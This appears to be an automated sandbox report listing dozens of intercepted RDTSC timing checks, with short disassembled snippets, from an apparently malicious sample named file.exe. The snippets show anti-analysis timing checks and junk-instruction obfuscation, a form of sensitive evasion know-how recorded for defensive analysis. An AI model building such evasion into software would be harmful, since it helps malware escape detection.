Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118344C second address: 118346D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F5E9072B8A8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183767 second address: 1183772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F5E907EB776h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1183772 second address: 11837AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5E9072B89Eh 0x00000008 pop eax 0x00000009 jo 00007F5E9072B8AAh 0x0000000f jmp 00007F5E9072B89Eh 0x00000014 jnp 00007F5E9072B896h 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jg 00007F5E9072B896h 0x00000025 push edi 0x00000026 pop edi 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FD78 second address: 118FD8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007F5E907EB776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FD8E second address: 118FD92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FD92 second address: 118FDA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F5E907EB776h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FDA8 second address: 118FDBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5E9072B8A1h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E073 second address: 118E077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E077 second address: 118E087 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F5E9072B896h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E087 second address: 118E097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E097 second address: 118E0C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jo 00007F5E9072B896h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 jmp 00007F5E9072B89Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E3F8 second address: 118E3FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E3FC second address: 118E41F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5E9072B8B1h 0x0000000c jmp 00007F5E9072B8A5h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118E82A second address: 118E836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5E907EB78Fh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 118FC05 second address: 118FC3F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5E9072B8A3h 0x00000008 jmp 00007F5E9072B89Bh 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F5E9072B89Ah 0x00000017 pop ebx 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5E9072B8A2h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1196D28 second address: 1196D3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F5E907EB776h 0x0000000f push eax 0x00000010 pop eax 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199FAE second address: 1199FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199982 second address: 11999B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F5E907EB781h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jmp 00007F5E907EB77Dh 0x00000013 je 00007F5E907EB776h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1199B29 second address: 1199B33 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E9072B89Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11A9480 second address: 11A9486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB576 second address: 11AB57A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB57A second address: 11AB58A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5E907EB77Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB0C6 second address: 11AB0CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11AB0CA second address: 11AB0CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BD4C7 second address: 11BD4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 js 00007F5E9072B896h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BD4D8 second address: 11BD4E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F5E907EB776h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11BD4E5 second address: 11BD4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C48A3 second address: 11C48C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E907EB787h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C48C0 second address: 11C48E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9072B8A8h 0x00000009 jnl 00007F5E9072B896h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4B9B second address: 11C4BCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Fh 0x00000007 jmp 00007F5E907EB781h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ecx 0x0000000f jmp 00007F5E907EB77Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4BCE second address: 11C4BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C4D54 second address: 11C4D59 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C52BE second address: 11C52C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C5BD1 second address: 11C5BD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C95EB second address: 11C95EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C95EF second address: 11C9605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E907EB780h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C9605 second address: 11C960C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11C960C second address: 11C961C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DAB92 second address: 11DAB98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DAB98 second address: 11DABAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DABAD second address: 11DABBE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11DC4AA second address: 11DC4B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D383E second address: 11D3846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3846 second address: 11D3850 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5E907EB776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11D3850 second address: 11D3876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ecx 0x00000008 jng 00007F5E9072B898h 0x0000000e jo 00007F5E9072B8AAh 0x00000014 jmp 00007F5E9072B89Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB875 second address: 11EB879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB879 second address: 11EB87D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203714 second address: 1203735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E907EB786h 0x00000009 pop ecx 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203735 second address: 120373A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1203B22 second address: 1203B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F5E907EB77Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1204109 second address: 1204116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F5E9072B89Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1204262 second address: 1204272 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5E907EB776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1204272 second address: 120428B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9072B89Ah 0x00000009 pop ecx 0x0000000a jmp 00007F5E9072B89Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120428B second address: 1204292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1204292 second address: 12042A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5E9072B896h 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12070FF second address: 120710D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F5E907EB776h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120719E second address: 12071A8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5E9072B89Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12073D7 second address: 120741F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F5E907EB778h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000004h 0x00000024 jmp 00007F5E907EB784h 0x00000029 push D564CE46h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120741F second address: 120742E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5E9072B89Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120742E second address: 1207438 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5E907EB77Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1207626 second address: 1207684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 jmp 00007F5E9072B8A1h 0x0000000b jnl 00007F5E9072B89Ch 0x00000011 popad 0x00000012 nop 0x00000013 jc 00007F5E9072B89Ch 0x00000019 mov dword ptr [ebp+122D28A8h], esi 0x0000001f cmc 0x00000020 push dword ptr [ebp+122D2928h] 0x00000026 mov edx, 1F4D3340h 0x0000002b push CEFFDA93h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F5E9072B8A8h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1207684 second address: 120768A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120768A second address: 120768F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120898C second address: 120899B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F5E907EB776h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 120899B second address: 12089A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12089A1 second address: 12089B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F5E907EB778h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12089B7 second address: 12089BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12089BF second address: 12089C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12089C7 second address: 12089CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50401EB second address: 504021E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov bx, cx 0x00000010 movzx ecx, di 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov di, si 0x0000001c mov ah, DAh 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020E53 second address: 5020E65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E9072B89Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020E65 second address: 5020E82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E907EB77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 mov bh, 00h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060F45 second address: 5060F4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060F4B second address: 5060F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5060F4F second address: 5060F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500012D second address: 5000131 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000131 second address: 5000135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000135 second address: 500013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 500013B second address: 50001B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ebx, 41CB2004h 0x00000010 mov dl, 38h 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 push esi 0x00000016 mov ecx, edx 0x00000018 pop ebx 0x00000019 mov edx, ecx 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F5E9072B8A4h 0x00000023 push dword ptr [ebp+04h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F5E9072B89Eh 0x0000002d xor si, BB18h 0x00000032 jmp 00007F5E9072B89Bh 0x00000037 popfd 0x00000038 mov cx, 22CFh 0x0000003c popad 0x0000003d push dword ptr [ebp+0Ch] 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F5E9072B89Ch 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50001B2 second address: 50001B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50001B8 second address: 50001DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E9072B89Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E9072B89Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50001DB second address: 50001DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 50001DF second address: 50001E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000264 second address: 5000268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5000268 second address: 500026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B4E second address: 5020B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B52 second address: 5020B56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B56 second address: 5020B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B5C second address: 5020B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B62 second address: 5020B72 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, 54h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B72 second address: 5020B77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5020B77 second address: 5020B7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
